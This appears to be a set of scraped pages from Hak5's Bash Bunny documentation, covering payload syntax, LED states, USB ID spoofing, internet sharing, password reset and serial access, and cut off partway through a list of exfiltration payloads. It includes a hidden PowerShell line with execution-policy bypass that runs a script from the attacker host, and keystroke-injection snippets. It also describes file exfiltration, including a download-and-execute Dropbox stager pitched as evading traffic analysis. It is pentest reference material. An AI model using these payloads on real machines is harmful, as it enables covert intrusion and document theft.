. However, if the code you’re intending to inject on a system uses a variable `$URL` (and so does your _bash bunny payload_) you will **not get the intended results** because bash will have **resolved it** _rather than injecting it._
You may find that there may be other, similar caveats when building complex payloads with the power of Bash+DuckyScript.
* * *
[_navigate\_before_ DuckyScript™ On The Bash Bunny](https://docs.hak5.org/bash-bunny/writing-payloads/duckyscript-on-the-bash-bunny/)
[Extensions _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/extensions/)
---
# Extensions | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Extensions
==========
Extensions which augment DuckyScript with new commands and functions. For each payload.txt run, extensions are sourced automatically. Calling the function names of any extension will produce the desired result. Extensions reside in the payload library on the USB mass storage partition from `/payloads/library/extensions`.
### EXAMPLE EXTENSIONS [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/extensions/#example-extensions)
This table is provides a non-exhaustive list of basic usage for some extensions. Additional extension documentation can be found from the comments within each individual extension script file in `/payload/library/extensions`.
| COMMAND | Description | Example |
| --- | --- | --- |
| `RUN` | Keystroke injection shortcut for mutli-OS command execution. | `RUN WIN notepad.exe` |
| | | `RUN OSX terminal` |
| | | `RUN UNITY xterm` |
| `GET` | Exports system variables | `GET TARGET_IP # exports $TARGET_IP` |
| | | `GET TARGET_HOSTNAME # exports $TARGET_HOSTNAME` |
| | | `GET HOST_IP # exports $HOST_IP` |
| | | `GET SWITCH_POSITION # exports $SWITCH_POSITION` |
| `REQUIRETOOL` | Exits payload with LED FAIL state if the specified tool is not found in /tools | `REQUIRETOOL impacket` |
| `DUCKY_LANG` | Accepts two letter country code to set the HID injection language for subsequent ducky script / QUACK commands | `DUCKY_LANG us` |
info
Extensions replaced `bunny_helpers.sh` from [Bash Bunny firmware version 1.1](https://www.bashbunny.com/downloads/)
onwards.
info
Extensions come pre-installed on the Bash Bunny Mark II
* * *
[_navigate\_before_ QUACK](https://docs.hak5.org/bash-bunny/writing-payloads/quack/)
[Attack Mode _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/attackmode/attack-mode/)
---
# LED | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
LED
===
The multi-color RGB LED status indicator on the Bash Bunny may be set using the `LED` command. It accepts either a combination of color and pattern, or a common payload state.
### LED COLORS [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/led/#led-colors)
| COMMAND | Description |
| --- | --- |
| R | Red |
| G | Green |
| B | Blue |
| Y | Yellow (AKA as Amber) |
| C | Cyan (AKA Light Blue) |
| M | Magenta (AKA Violet or Purple) |
| W | White |
#### LED PATTERNS [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/led/#led-patterns)
| PATTERN | Description |
| --- | --- |
| SOLID | _Default_ No blink. Used if pattern argument is ommitted |
| SLOW | Symmetric 1000ms ON, 1000ms OFF, repeating |
| FAST | Symmetric 100ms ON, 100ms OFF, repeating |
| VERYFAST | Symmetric 10ms ON, 10ms OFF, repeating |
| SINGLE | 1 100ms blink(s) ON followed by 1 second OFF, repeating |
| DOUBLE | 2 100ms blink(s) ON followed by 1 second OFF, repeating |
| TRIPLE | 3 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUAD | 4 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUIN | 5 100ms blink(s) ON followed by 1 second OFF, repeating |
| ISINGLE | 1 100ms blink(s) OFF followed by 1 second ON, repeating |
| IDOUBLE | 2 100ms blink(s) OFF followed by 1 second ON, repeating |
| ITRIPLE | 3 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUAD | 4 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUIN | 5 100ms blink(s) OFF followed by 1 second ON, repeating |
| SUCCESS | 1000ms VERYFAST blink followed by SOLID |
| 1-10000 | Custom value in ms for continuous symmetric blinking |
### LED STATE [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/led/#led-state)
These standardized `LED` States may be used to indicate common payload status. The basic `LED` states include `SETUP`, `FAIL`, `ATTACK`, `CLEANUP` and `FINISH`. Payload developers are encouraged to use these common payload states. Additional states including multi-staged attack patterns are shown in the table below.
| STATE | COLOR PATTERN | Description |
| --- | --- | --- |
| SETUP | M SOLID | Magenta solid |
| FAIL | R SLOW | Red slow blink |
| FAIL1 | R SLOW | Red slow blink |
| FAIL2 | R FAST | Red fast blink |
| FAIL3 | R VERYFAST | Red very fast blink |
| ATTACK | Y SINGLE | Yellow single blink |
| STAGE1 | Y SINGLE | Yellow single blink |
| STAGE2 | Y DOUBLE | Yellow double blink |
| STAGE3 | Y TRIPLE | Yellow triple blink |
| STAGE4 | Y QUAD | Yellow quadruple blink |
| STAGE5 | Y QUIN | Yellow quintuple blink |
| SPECIAL | C ISINGLE | Cyan inverted single blink |
| SPECIAL1 | C ISINGLE | Cyan inverted single blink |
| SPECIAL2 | C IDOUBLE | Cyan inverted double blink |
| SPECIAL3 | C ITRIPLE | Cyan inverted triple blink |
| SPECIAL4 | C IQUAD | Cyan inverted quadriple blink |
| SPECIAL5 | C IQUIN | Cyan inverted quintuple blink |
| CLEANUP | W FAST | White fast blink |
| FINISH | G SUCCESS | Green 1000ms VERYFAST blink followed by SOLID |
### EXAMPLES [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/led/#examples)
`LED Y SINGLE`
`LED M 500`
`LED SETUP`
* * *
[_navigate\_before_ VID, PID, MAN, PROD, SN](https://docs.hak5.org/bash-bunny/writing-payloads/attackmode/vid-pid-man-prod-sn/)
[Working with the File System _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/working-with-the-file-system/)
---
# Working with the File System | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Working with the File System
============================
The Bash Bunny contains a USB Mass Storage partition (also known as udisk) which is typically accessed via Arming Mode. This is the Bash Bunny flash drive to which payloads are copied.
When the Bash Bunny framework executes a payload, it will synchronize the USB Mass Storage partition file system once the payload completes. This can be either by an exit statement in the payload.txt, or when the Ducky Script reaches the end of file.
Keep this in mind as a payload which writes files to the USB Mass Storage partition within a loop will not have the opportunity to synchronize until the payload completes. This is why ending payloads with an LED FINISH command is advised. In this case, the payload developer is advised to use the sync command to ensure file synchronization is completed.
Further, the udisk command may be used to manipulate the USB Mass Storage partition, allowing you to mount and unmount the partition as well as reformat the partition. From the Bash Bunny console:
`root@bunny:~# udisk [ mount | unmount | remount | reformat ]`
* * *
[_navigate\_before_ LED](https://docs.hak5.org/bash-bunny/writing-payloads/led/)
[Contributing Best Practices _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/)
---
# Contributing Best Practices | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Contributing Best Practices
===========================
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Please adhere to the following best practices and style guide when submitting a payload.
#### Naming Conventions [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/#naming-conventions)
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote\_access or recon. Do not create your own category.
#### Binaries [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/#binaries)
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
#### Comments [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/#comments)
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
`Title: SMB Exfiltrator Description: Exfiltrates files from %userprofile%\documents via SMB Author: Hak5Darren Target: Windows XP SP3 - Latest Dependencies: impacket`
#### Configuration Options [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/#configuration-options)
Configurable options should be specified in variables at the top of the payload.txt file
`# Options RESPONDER_OPTIONS="-w -r -d -P" LOOTDIR=/root/udisk/loot/quickcreds`
#### LED [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/#led)
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
`# Initialization LED SETUP GET SWITCH_POSITION GET HOST_IP # Attack LED ATTACK ATTACKMODE HID ECM_ETHERNET`
#### Stages and States [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/#stages-and-states)
Stages should be documented with comments
`# Keystroke Injection Stage # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available GET HOST_IP LED STAGE1 ATTACKMODE HID RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""`
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
* * *
[_navigate\_before_ Working with the File System](https://docs.hak5.org/bash-bunny/writing-payloads/working-with-the-file-system/)
[CPU Control _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/cpu-control/)
---
# CPU Control | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
CPU Control
===========
From firmware version 1.3 onwards, the CPU may be controlled using the `CUCUMBER` command. By default, `CUCUMBER` is set to `DISABLE` - which sets the CPU governor to ‘ondemand’. This is a good balance between performance and power draw with all cores scaling as needed.
To avoid excess heat buildup with payloads which require long term deployments, use `CUCUMBER ENABLE` to disable all but one CPU core and set the governor to ‘ondemand’. This will keep the Bash Bunny cool as a, vegetable of choice.
To set the Bash Bunny to maximum performance, `CUCUMBER` may be set to `PLAID`[.](https://www.youtube.com/watch?v=mk7VWcuVOf0)
This enables all cores and sets the governor to ‘performance’.
| **MODE** | **Setting** | **Notes** |
| --- | --- | --- |
| `CUCUMBER ENABLE` | Single core ‘ondemand’ | Low power for long term deployments |
| `CUCUMBER DISABLE` | Quad core ‘ondemand’ | Default setting |
| `CUCUMBER PLAID` | Quad core ‘performance’ | Beyond ludicrous speed |
Much like `ATTACKMODE`, the CPU may be controlled dynamically in a given payload. This means that, for example, one stage of an attack may use the lower power `CUCUMBER ENABLE` setting while another may use the higher power `CUCUMBER PLAID` setting.
* * *
[_navigate\_before_ Contributing Best Practices](https://docs.hak5.org/bash-bunny/writing-payloads/contributing-best-practices/)
[Submitting Payloads _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/submitting-payloads/)
---
# VID, PID, MAN, PROD, SN | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
VID, PID, MAN, PROD, SN
=======================
USB devices identify themselves by combinations of vendor ID and product ID. These 16-bit IDs are specified in hex and are used by the target PC to find drivers (if necessary) for the specified device. With the Bash Bunny, the VID and PID may be spoofed using the `VID` and `PID` parameters for `ATTACKMODE`.
`ATTACKMODE HID STORAGE VID_0XF000 PID_0X1234`
Similarly, the Manufacturer (32 chr), Product name (32 chr), and Serial number (10 digit) may be specified with `MAN_`, `PROD_`, and `SN_`.
`ATTACKMODE HID STORAGE VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_1337`
* * *
[_navigate\_before_ Attack Mode](https://docs.hak5.org/bash-bunny/writing-payloads/attackmode/attack-mode/)
[LED _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/led/)
---
# Submitting Payloads | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Submitting Payloads
===================
Payloads may be submitted to the [Bash Bunny Payload git repository](https://github.com/hak5/bashbunny-payloads)
. For a video tutorial on submitting payloads, see [Hak5 episode 2126](https://youtu.be/H6z9BXevsZg)
.
Notable payloads are featured on the Hak5 PayloadHub at [payloads.hak5.org](https://payloads.hak5.org/)
There you may find additional resources to quickly and easily contribute payloads to the community repositories.
* * *
[_navigate\_before_ CPU Control](https://docs.hak5.org/bash-bunny/writing-payloads/cpu-control/)
[WAIT\_FOR\_PRESENT _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/wait_for_present/)
---
# WAIT_FOR_PRESENT | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
WAIT\_FOR\_PRESENT
==================
With the Bash Bunny Mark II, payload stages may be triggered using the `WAIT_FOR_PRESENT` and `WAIT_FOR_NOT_PRESENT` extensions.
Geofencing may be achieved by profiling the bluetooth wireless environment of the target. Multiple `WAIT_FOR_PRESENT` commands may be “stacked” one after another.
**WAIT\_FOR\_PRESENT** [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/wait_for_present/#wait_for_present)
----------------------------------------------------------------------------------------------------------------------
`# Pauses payload execution until specified bluetooth identifier IS present# Usage: WAIT_FOR_PRESENT devicename`
#### **Example** [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/wait_for_present/#example)
`# Stage 1: Enumerate as mass storage with silent HID device ATTACKMODE HID STORAGE WAIT_FOR_PRESENT my-bluetooth-device-name # Stage 2: Type Hello World into Notepad WIN RUN notepad.exe QUACK DELAY 1000 QUACK STRING Hello World`
### WAIT\_FOR\_NOT\_PRESENT [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/wait_for_present/#wait_for_not_present)
`# Pauses payload execution until specified bluetooth identifier IS NOT present # Usage: WAIT_FOR_NOTPRESENT devicename`
* * *
[_navigate\_before_ Submitting Payloads](https://docs.hak5.org/bash-bunny/writing-payloads/submitting-payloads/)
[Getting the Bash Bunny Online _navigate\_next_](https://docs.hak5.org/bash-bunny/internet-connectivity/getting-the-bash-bunny-online/)
---
# Sharing an Internet connection from Windows | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Sharing an Internet connection from Windows
===========================================
1. Configure a payload.txt for ATTACKMODE RNDIS\_ETHERNET
2. Boot Bash Bunny from RNDIS\_ETHERNET configured payload on the host Windows PC
3. Open Control Panel > Network Connections (Start > Run > “ncpa.cpl” > Enter)
4. Identify Bash Bunny interface. Device name: “USB Ethernet/RNDIS Gadget”
5. Right-click Internet interface (e.g. Wi-Fi) and click Properties.
6. From the Sharing tab, check “Allow other network users to connect through this computer’s Internet connection”, select the Bash Bunny from the Home networking connection list (e.g. Ethernet 2) and click OK.
7. Right-click Bash Bunny interface (e.g. Ethenet 2) and click Properties.
8. Select TCP/IPv4 and click Properties.
9. Set the IP address to 172.16.64.64. Leave Subnet mask as 255.255.255.0 and click OK on both properties windows. Internet Connection Sharing is complete
* * *
[_navigate\_before_ Getting the Bash Bunny Online](https://docs.hak5.org/bash-bunny/internet-connectivity/getting-the-bash-bunny-online/)
[Sharing an Internet connection from Linux _navigate\_next_](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-linux/)
---
# Sharing an Internet connection from Linux | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Sharing an Internet connection from Linux
=========================================
Sharing an Internet connection from Linux [_link_](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-linux/#sharing-an-internet-connection-from-linux)
================================================================================================================================================================================================
1. Download the Internet Connection Sharing script from bashbunny.com/bb.sh
2. Run the bb.sh connection script with bash as root
3. Follow the \[M\]anual or \[G\]uided setup to configure iptables and routing
4. Save settings for future sessions and \[C\]onnect
`wget bashbunny.com/bb.sh sudo bash ./bb.sh`
\\
* * *
[_navigate\_before_ Sharing an Internet connection from Windows](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-windows/)
[Sharing an Internet connection from MacOS _navigate\_next_](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-macos/)
---
# Sharing an Internet connection from MacOS | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Sharing an Internet connection from MacOS
=========================================
The Bash Bunny can share the Internet connection of a host computer. This can be useful when installing additional software on your Bash Bunny. Following these instructions, you will be able to share your Mac’s Internet connection with your Bash Bunny so that, when connected to your Bash Bunny via SSH, you will be able to successfully issue commands requiring an Internet connection such as git clone or apt-get.
METHOD 1: DHCLIENT EXTENSION [_link_](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-macos/#method-1-dhclient-extension)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
[macOS Internet Connection Sharing Tutorial](https://youtu.be/U2UMz9C283M)
1. Ensure that the Bash Bunny has been updated to the latest firmware and that the [get2\_dhclient.sh extension](https://raw.githubusercontent.com/hak5/bashbunny-payloads/master/payloads/extensions/get2_dhclient.sh)
is present in the payloads/extensions/ directory on the Bash Bunny’s USB mass storage partition. If not, copy the extension from the linked Bash Bunny repository.
2. With the Bash Bunny in arming mode, create a new `payload.txt` in switch position 1 directory as follows:
`LED SETUPATTACKMODE ECM_ETHERNETDHCLIENTLED FINISH≈`
3. Safely eject the Bash Bunny, then flip the selector switch to position 1 and reconnect it to your Mac.
4. From the System Preferences > Sharing menu on your Mac, check Internet Sharing, then select the Internet interface from “Share your connection from” and the Bash Bunny (labeled RNDIS/Ethernet Gadget) from “To computer using”, then save changes and close the menu.
5. If this is your first time configuring Internet Connection Sharing for this Bash Bunny on your Mac, you may now need to unplug and replug the Bash Bunny while in the same switch position 1. The LED will indicate magenta while the ECM Ethernet interface comes online and the DHCP client on the Bash Bunny then attempts to obtain an IP address from your Mac. Once successful, the LED will change to green.
6. The Bash Bunny will get an IP address from your Mac in the 192.168.2.x/24 range (likely 192.168.2.2). Check the bridge100 interface with the ifconfig command in a terminal.You should now be able to SSH into the Bash Bunny from the terminal, for example with the command `ssh root@192.168.2.2`
METHOD 2: SQUID VIA MACPORTS [_link_](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-macos/#method-2-squid-via-macports)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. Configure a payload.txt for `ATTACKMODE ECM_ETHERNET STORAGE`
2. Boot Bash Bunny from an `ECM_ETHERNET` configured payload
3. Open a terminal on the OSX host. Install Macports if you don’t have it installed already. [http://macports.org](https://macports.org/)
4. Install and set up Squid on the OSX host:
`sudo port install squid sudo squid -z sudo squid`
5. You will now have an open (!!) proxy running on all interfaces of your host. If you are not in a trusted environment, limit the interface in the `squid.conf` file.
6. SSH to the bash bunny
`ssh root@172.16.64.1`
7. Set up the proxy server using environment variables.
`export http_proxy=http://172.16.64.10:3128 <-- change the IP address to match the host IP if needed`
8. Your Bash Bunny should now be on-line.
`apt-get update; apt-get upgrade`
* * *
[_navigate\_before_ Sharing an Internet connection from Linux](https://docs.hak5.org/bash-bunny/internet-connectivity/sharing-an-internet-connection-from-linux/)
[Updating the Bash Bunny Firmware _navigate\_next_](https://docs.hak5.org/bash-bunny/software-updates/updating-the-bash-bunny-firmware/)
---
# Password Reset | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_Password Reset_
Password Reset
==============
If you’ve lost your password and have access to the BashBunny storage in arming mode, set the password to `hak5bunny` with this payload:
`#!/bin/bash LED SETUP ATTACKMODE SERIAL echo -e "hak5bunny\nhak5bunny" | passwd LED FINISH`
1. Save the above as `payload.txt` in the `/payloads/switch1/` directory.
2. Safely eject the BashBunny drive.
3. Flip the switch to position 1
4. Plug in the Bash Bunny and wait for the green blinking FINISH pattern.
5. Login via Serial with the root password `hak5bunny`
* * *
[_navigate\_before_ Factory Reset](https://docs.hak5.org/bash-bunny/troubleshooting/factory-reset/)
[Writing Keystroke Injection Payloads for the Bash Bunny _navigate\_next_](https://docs.hak5.org/bash-bunny/beginner-guides/writing-keystroke-injection-payloads-for-the-bash-bunny/)
---
# Writing Keystroke Injection Payloads for the Bash Bunny | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Writing Keystroke Injection Payloads for the Bash Bunny
=======================================================
Computers trust humans. Humans interact with keyboards. Hence the Human Interface Device or HID standard used by all modern USB keyboards. To a computer, if the device says it’s a keyboard — it’s a keyboard.

To pentesters, a small USB device pre-programmed to inject keystrokes into the victim computer covertly hidden inside a regular flash-drive case is a recipe for social engineering success. Hence the popular Hak5 USB Rubber Ducky – the device that invented keystroke injection attacks.
Building on this, the Bash Bunny directly interprets the Ducky Script language that has become synonymous with bad USB attacks.
With its HID attack mode, the Bash Bunny becomes a keyboard, and Ducky Script is processed with a quick and easy QUACK command.
`GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" LED FINISH`
As you can see from the above simple payload snippet, the Ducky Script tells the Bash Bunny to become both a keyboard and a flash drive. Then, it injects keystrokes which instruct the Windows target to run a powershell script saved on said flash drive.
Advanced attacks are enabled by combining HID attacks with the additional USB device supported by the Bash Bunny – like gigabit Ethernet, Serial and Storage. Coupled with a scripting language that supports conditions and logic using BASH, a new era of keystroke injection attacks are possible.
Learn more about using Ducky Script for Keystroke Injection attacks from the **Payload Development** section of the Bash Bunny documentation.
* * *
[_navigate\_before_ Password Reset](https://docs.hak5.org/bash-bunny/troubleshooting/password-reset/)
[Network Hijacking Attacks with the Bash Bunny _navigate\_next_](https://docs.hak5.org/bash-bunny/beginner-guides/network-hijacking-attacks-with-the-bash-bunny/)
---
# Getting Root on a Bash Bunny from the Serial Console | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Getting Root on a Bash Bunny from the Serial Console
====================================================
Throughout the history of personal computers, serial has been a mainstay for file transfer and console access. To this day it’s widely used, from headless servers to embedded microcontrollers. With the Bash Bunny, we’ve made it convenient as ever – without the need for a serial-to-USB converter.

With dedicated shell access from the arming mode, dropping to the Bash Bunny Linux terminal is simple over serial from any OS. When combined with advanced payloads, using the serial attack mode, there’s limitless potential for creativity with this often overlooked interface.
{% embed url=“[https://youtu.be/8j6hrjSrJaM"](https://youtu.be/8j6hrjSrJaM%22)
%}
### CONNECTING TO THE SERIAL CONSOLE FROM WINDOWS [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/getting-root-on-a-bash-bunny-from-the-serial-console/#connecting-to-the-serial-console-from-windows)
Find the COM# from Device Manager > Ports (COM & LPT) and look for USB Serial Device (COM#). Example: COM3
Alternatively, run the following powershell command to list ports:
`[System.IO.Ports.SerialPort]::getportnames()`
Enter COM# for serial line and 115200 for Speed. Click Open.
[Download PuTTY](http://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
### CONNECTING TO THE SERIAL CONSOLE FROM LINUX/MAC [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/getting-root-on-a-bash-bunny-from-the-serial-console/#connecting-to-the-serial-console-from-linuxmac)
1. Find the Bash Bunny device from the terminal
`ls /dev/tty*" or "dmesg | grep tty`
> Usually on a Linux host, the Bash Bunny will register as either `/dev/ttyUSB0` or `/dev/ttyACM0`. On an OSX/macOS host, the Bash Bunny will register as `/dev/tty.usbmodemch000001`.
2. Next, connect to the serial device using `screen`, `minicom` or your terminal emulator of choice.
> If screen is not installed it can usually be found from your distributions package manager.
>
> `sudo apt install screen`
>
>
> **Connecting with screen**
>
> `sudo screen /dev/ttyACM0 115200`
>
>
> Disconnect with keyboard combo: `CTRL+a` followed by `CTRL+\`
User: root
Password: hak5bunny
* * *
[_navigate\_before_ Network Hijacking Attacks with the Bash Bunny](https://docs.hak5.org/bash-bunny/beginner-guides/network-hijacking-attacks-with-the-bash-bunny/)
[Top 5 Bash Bunny Exfiltration Payloads to "steal files" _navigate\_next_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/)
---
# Top 5 Bash Bunny Exfiltration Payloads to "steal files" | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Top 5 Bash Bunny Exfiltration Payloads to "steal files"
=======================================================
Top 5 Bash Bunny Exfiltration Payloads to “steal files” [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#top-5-bash-bunny-exfiltration-payloads-to-steal-files)
================================================================================================================================================================================================================================
As anyone in IT knows, two is one — one is none. It’s important to backup your documents. As a penetration testers know, exfiltration is a fancy word for an involuntary backup. To that end, the Bash Bunny features at storage attack mode capable of intelligent exfiltration, with gigs of high speed USB flash storage. It’s perfect for binary injection, staged payloads and more.
It’s also the most convenient way to configure the Bash Bunny, with an dedicated access to its USB Flash Storage. Just slide the payload switch to arming mode and plug the Bash Bunny into your computer or smartphone. As a standard flash drive, it’s simple to navigate and configure. Modify payloads on the fly by editing simple text files. Assign payloads to switch positions by copying files. Browse the entire payload library right from the flash storage. Even review captured data from the “loot” folder. It couldn’t be more straightforward.
TOP 5 EXFILTRATION PAYLOADS [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#top-5-exfiltration-payloads)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
These are just some of our favorite exfiltration payloads. For the complete listing, check out the [Bash Bunny payload highlights](https://hak5.org/blogs/payloads/tagged/bash-bunny)
.
### 1.USB EXFILTRATOR [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#1usb-exfiltrator)
[USB Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/exfiltrator-for-bash-bunny)
Exfiltrates files from the users Documents folder Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp.
\\
### 2\. FASTER SMB EXFILTRATOR [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#2-faster-smb-exfiltrator)
[Faster SMB Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/faster-smb-exfiltrator)
Exfiltrates select files from users’s documents folder via SMB. Liberated documents will reside in Bash Bunny loot directory under `loot/smb_exfiltrator/HOSTNAME/DATE_TIME`
{% embed url=“[https://youtu.be/VPhqD\_\_lOBQ"](https://youtu.be/VPhqD__lOBQ%22)
%}
This payload is a rewrite of a previous SMB exfiltration attack which uses a robocopy method to quickly exfiltrate loot in a multithreaded fashion. Further, an `EXFILTRATION_COMPLETE` file is used to indicate when the attack is finished.
### 3\. OPTICAL EXFILTRATION [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#3-optical-exfiltration)
[Optical Exfiltration on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/optical-exfiltration)
This is a quick HID only attack to write an HTML/JS file to target machine and open a browser, to exfiltrate data Using QR Codes and a video recording device.
It’s based on QR Extractor, which converts a selected file to base64, then chunks up the string based on the specified qr\_string\_size (Note: the larger the chunk size, the larger you’ll need to set the qr\_image\_size, or you won’t be able to read the QR Code). These Chunks are then converted into QR Codes and displayed in the browser and can be played back at a speed specified by the playback\_delay setting.
{% embed url=“[https://youtu.be/sZpIiSfRMSw"](https://youtu.be/sZpIiSfRMSw%22)
%}
We love this payload because it uses free-space-optics to exfiltrate data in such a way that no meaningful mass storage or network logs would be created. Check out the video on this novel attack!
### 4\. DROPBOX EXFILTRATOR [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#4-dropbox-exfiltrator)
[Dropbox Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/dropbox-exfiltrator-proof-of-concept)
This is a proof-of-concept payload using a stager. That means the staged powershell payload will download and execute an `exfil.ps1` from dropbox which compresses the users documents folder and uploads it to dropbox.
{% embed url=“[https://youtu.be/TBBT1c2zjms"](https://youtu.be/TBBT1c2zjms%22)
%}
It uses a powershell IWR/IEX method to compress and exfiltrate documents using a public Dropbox share. We love it because to any network traffic analyzer, it’s just your ordinary encrypted Dropbox traffic.
### 5\. POWERSHELL TCP EXTRACTOR [_link_](https://docs.hak5.org/bash-bunny/beginner-guides/top-5-bash-bunny-exfiltration-payloads-to-steal-files/#5-powershell-tcp-extractor)
